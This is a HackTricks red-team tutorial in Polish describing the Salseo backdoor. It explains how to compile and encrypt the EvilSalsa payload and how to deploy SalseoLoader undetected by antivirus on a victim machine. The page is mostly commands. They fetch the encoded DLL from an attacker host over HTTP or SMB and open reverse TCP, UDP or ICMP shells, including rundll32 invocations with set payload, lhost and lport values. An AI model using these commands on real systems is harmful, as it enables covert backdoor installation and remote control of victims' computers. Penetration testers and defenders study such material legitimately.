hacktricks/c2/salseo.md

185 lines
7.6 KiB
Markdown
Raw Normal View History

2024-04-06 19:35:05 +00:00
# Salseo
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:35:05 +00:00
<details>
2024-04-06 19:35:05 +00:00
<summary>Support HackTricks</summary>
2024-04-06 19:35:05 +00:00
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
2024-04-06 19:35:05 +00:00
</details>
{% endhint %}
2024-04-06 19:35:05 +00:00
## Kompilacja binarek
2024-04-06 19:35:05 +00:00
Pobierz kod źródłowy z githuba i skompiluj **EvilSalsa** oraz **SalseoLoader**. Będziesz potrzebować zainstalowanego **Visual Studio**, aby skompilować kod.
2024-04-06 19:35:05 +00:00
Skompiluj te projekty dla architektury komputera z systemem Windows, na którym zamierzasz ich używać (jeśli Windows obsługuje x64, skompiluj je dla tej architektury).
2024-04-06 19:35:05 +00:00
Możesz **wybrać architekturę** w Visual Studio w **lewej zakładce "Build"** w **"Platform Target".**
2024-04-06 19:35:05 +00:00
(\*\*Jeśli nie możesz znaleźć tych opcji, kliknij w **"Project Tab"** a następnie w **"\<Nazwa Projektu> Properties"**)
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (839).png>)
2024-04-06 19:35:05 +00:00
Następnie zbuduj oba projekty (Build -> Build Solution) (W logach pojawi się ścieżka do pliku wykonywalnego):
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (381).png>)
2024-04-06 19:35:05 +00:00
## Przygotowanie Backdoora
2024-04-06 19:35:05 +00:00
Przede wszystkim będziesz musiał zakodować **EvilSalsa.dll.** Aby to zrobić, możesz użyć skryptu python **encrypterassembly.py** lub możesz skompilować projekt **EncrypterAssembly**:
2024-04-06 19:35:05 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
Ok, teraz masz wszystko, co potrzebne do wykonania całej operacji Salseo: **zakodowany EvilDalsa.dll** i **plik binarny SalseoLoader.**
2024-04-06 19:35:05 +00:00
**Prześlij plik binarny SalseoLoader.exe na maszynę. Nie powinny być wykrywane przez żadne AV...**
2024-04-06 19:35:05 +00:00
## **Wykonaj backdoora**
2024-04-06 19:35:05 +00:00
### **Uzyskanie odwrotnej powłoki TCP (pobieranie zakodowanego dll przez HTTP)**
2024-04-06 19:35:05 +00:00
Pamiętaj, aby uruchomić nc jako nasłuchującego powłokę odwrotną oraz serwer HTTP do serwowania zakodowanego evilsalsa.
2024-04-06 19:35:05 +00:00
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **Uzyskiwanie odwrotnej powłoki UDP (pobieranie zakodowanej dll przez SMB)**
2024-04-06 19:35:05 +00:00
Pamiętaj, aby uruchomić nc jako nasłuchującego powłokę odwrotną oraz serwer SMB, aby udostępnić zakodowaną evilsalsa (impacket-smbserver).
2024-04-06 19:35:05 +00:00
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
### **Uzyskiwanie odwrotnego powłoki ICMP (zakodowana dll już wewnątrz ofiary)**
2024-04-06 19:35:05 +00:00
**Tym razem potrzebujesz specjalnego narzędzia w kliencie, aby odebrać odwrotną powłokę. Pobierz:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
2024-04-06 19:35:05 +00:00
#### **Wyłącz odpowiedzi ICMP:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### Wykonaj klienta:
2024-04-06 19:35:05 +00:00
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### Wewnątrz ofiary, wykonajmy rzecz salseo:
2024-04-06 19:35:05 +00:00
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## Kompilowanie SalseoLoader jako DLL eksportującego funkcję główną
2024-04-06 19:35:05 +00:00
Otwórz projekt SalseoLoader w Visual Studio.
2024-04-06 19:35:05 +00:00
### Dodaj przed funkcją główną: \[DllExport]
![](<../.gitbook/assets/image (409).png>)
2024-04-06 19:35:05 +00:00
### Zainstaluj DllExport dla tego projektu
#### **Narzędzia** --> **Menedżer pakietów NuGet** --> **Zarządzaj pakietami NuGet dla rozwiązania...**
![](<../.gitbook/assets/image (881).png>)
2024-04-06 19:35:05 +00:00
#### **Szukaj pakietu DllExport (używając zakładki Przeglądaj), a następnie naciśnij Zainstaluj (i zaakceptuj okno popup)**
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (100).png>)
2024-04-06 19:35:05 +00:00
W folderze projektu pojawiły się pliki: **DllExport.bat** i **DllExport\_Configure.bat**
### **U**ninstaluj DllExport
2024-04-06 19:35:05 +00:00
Naciśnij **Odinstaluj** (tak, to dziwne, ale uwierz mi, to konieczne)
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (97).png>)
2024-04-06 19:35:05 +00:00
### **Zamknij Visual Studio i uruchom DllExport\_configure**
2024-04-06 19:35:05 +00:00
Po prostu **zamknij** Visual Studio
Następnie przejdź do swojego **folderu SalseoLoader** i **uruchom DllExport\_Configure.bat**
2024-04-06 19:35:05 +00:00
Wybierz **x64** (jeśli zamierzasz używać go w środowisku x64, tak było w moim przypadku), wybierz **System.Runtime.InteropServices** (w **Namespace for DllExport**) i naciśnij **Zastosuj**
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (882).png>)
2024-04-06 19:35:05 +00:00
### **Otwórz projekt ponownie w Visual Studio**
**\[DllExport]** nie powinno być już oznaczone jako błąd
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (670).png>)
2024-04-06 19:35:05 +00:00
### Zbuduj rozwiązanie
Wybierz **Typ wyjścia = Biblioteka klas** (Projekt --> Właściwości SalseoLoader --> Aplikacja --> Typ wyjścia = Biblioteka klas)
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (847).png>)
2024-04-06 19:35:05 +00:00
Wybierz **platformę x64** (Projekt --> Właściwości SalseoLoader --> Budowanie --> Cel platformy = x64)
2024-04-06 19:35:05 +00:00
![](<../.gitbook/assets/image (285).png>)
2024-04-06 19:35:05 +00:00
Aby **zbudować** rozwiązanie: Buduj --> Zbuduj rozwiązanie (W konsoli wyjściowej pojawi się ścieżka do nowego DLL)
2024-04-06 19:35:05 +00:00
### Przetestuj wygenerowane Dll
Skopiuj i wklej Dll tam, gdzie chcesz go przetestować.
2024-04-06 19:35:05 +00:00
Wykonaj:
```
rundll32.exe SalseoLoader.dll,main
```
Jeśli nie pojawi się błąd, prawdopodobnie masz funkcjonalny DLL!!
2024-04-06 19:35:05 +00:00
## Uzyskaj powłokę za pomocą DLL
2024-04-06 19:35:05 +00:00
Nie zapomnij użyć **serwera** **HTTP** i ustawić **nasłuchiwacza** **nc**
2024-04-06 19:35:05 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:35:05 +00:00
<details>
2024-04-06 19:35:05 +00:00
<summary>Wsparcie dla HackTricks</summary>
2024-04-06 19:35:05 +00:00
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
2024-04-06 19:35:05 +00:00
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
2024-04-06 19:35:05 +00:00
</details>
{% endhint %}